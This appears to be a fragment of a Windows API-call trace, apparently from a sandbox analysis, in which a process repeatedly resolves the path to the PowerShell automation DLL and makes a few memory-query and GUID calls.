	[0411.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.954] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xb2195d76, Data2=0x5b3e, Data3=0x47a7, Data4=([0]=0xac, [1]=0x96, [2]=0x50, [3]=0xa1, [4]=0xbe, [5]=0xa3, [6]=0x35, [7]=0x87))) returned 0x0
	[0411.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.957] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.957] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.957] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.958] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.958] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.959] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.959] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.959] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.959] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.961] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.961] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.961] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.961] VirtualQuery (in: lpAddress=0x20b320, lpBuffer=0x20c1e0, dwLength=0x30 | out: lpBuffer=0x20c1e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
